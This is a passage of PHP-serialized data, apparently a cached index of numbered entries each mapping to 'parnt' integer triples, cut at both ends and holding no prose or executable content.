:0;i:183;i:1;i:0;i:2;i:1;}}}}i:500;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:349;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:348;i:1;i:0;i:2;i:1;}}}}i:501;a:1:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:350;i:1;i:0;i:2;i:1;}}}}i:502;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:503;a:11:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:241;i:1;i:0;i:2;i:1;}}}i:80;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:255;i:1;i:0;i:2;i:1;}}}}i:504;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:505;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:506;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:280;i:1;i:0;i:2;i:1;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:279;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:279;i:1;i:0;i:2;i:1;}}}}i:507;a:8:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:351;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:351;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:352;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:352;i:1;i:0;i:2;i:1;}}}}i:508;a:8:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:7;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:7;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}}i:509;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:510;a:5:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:71;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:165;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:511;a:2:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:512;a:13:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:353;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:241;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}}i:513;a:6:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:514;a:2:{i:66;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}i:25;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:515;a:12:{i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:135;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:354;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:355;i:1;i:0;i:2;i:1;}}}}i:516;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:517;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:518;a:11:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:356;i:1;i:0;i:2;i:1;}}}i:66;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:519;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:520;a:1:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:521;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:356;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:357;i:1;i:0;i:2;i:1;}}}i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:358;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:241;i:1;i:0;i:2;i:1;}}}}i:522;a:1:{i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:359;i:1;i:0;i:2;i:1;}}}}i:523;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:360;i:1;i:0;i:2;i:1;}}}i:76;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:524;a:1:{i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:361;i:1;i:0;i:2;i:1;}}}}i:525;a:1:{i:76;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:362;i:1;i:0;i:2;i:1;}}}}i:526;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:356;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:357;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:363;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:364;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:365;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:366;i:1;i:0;i:2;i:3;}}}}i:527;a:8:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:222;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:528;a:2:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}}i:529;a:12:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:356;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:357;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:367;i:1;i:0;i:2;i:1;}}}i:80;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:255;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:241;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:280;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:530;a:5:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:157;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:157;i:1;i:0;i:2;i:1;}}}}i:531;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:532;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:533;a:9:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:226;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:534;a:9:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:368;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:369;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:535;a:2:{i:81;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:370;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:371;i:1;i:0;i:2;i:1;}}}}i:536;a:5:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:537;a:4:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:538;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:539;a:5:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:183;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:177;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:346;i:1;i:0;i:2;i:1;}}}i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:540;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:541;a:1:{i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:542;a:2:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:543;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:544;a:5:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}}i:545;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:546;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:547;a:3:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:372;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:548;a:2:{i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:549;a:1:{i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:551;a:14:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:76;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:39;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:77;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:79;i:1;i:0;i:2;i:1;}}}}i:552;a:5:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:168;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:553;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:554;a:3:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:373;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:555;a:4:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\